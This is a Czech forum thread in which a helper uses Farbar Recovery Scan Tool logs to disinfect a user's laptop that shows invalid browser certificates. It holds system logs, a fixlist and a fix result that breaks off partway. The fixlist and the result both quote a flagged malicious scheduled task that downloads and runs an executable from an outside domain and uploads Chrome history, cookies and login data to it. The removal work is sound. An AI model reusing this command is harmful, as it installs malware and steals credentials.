Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\95.0.4638.54\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007
26-10-2021 17:59:44 AdwCleaner_BeforeCleaning_26/10/2021_17:59:43

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 08:01:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 06:55:42 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Předchozí vypnutí systému (18:23:36, ‎26.‎10.‎2021) bylo neočekávané.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ASLDR Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ATKGFNEX Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Main Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 72%
Total physical RAM: 4061.09 MB
Available physical RAM: 1134.52 MB
Total Virtual: 8120.32 MB
Available Virtual: 4981.81 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.34 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 20:07
od Rudy
Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

Re: neplatné certifikaty v prohližečích

Napsal: 26 říj 2021 20:13
od Eddydye
Fix result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 21:09:59) Run:1
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
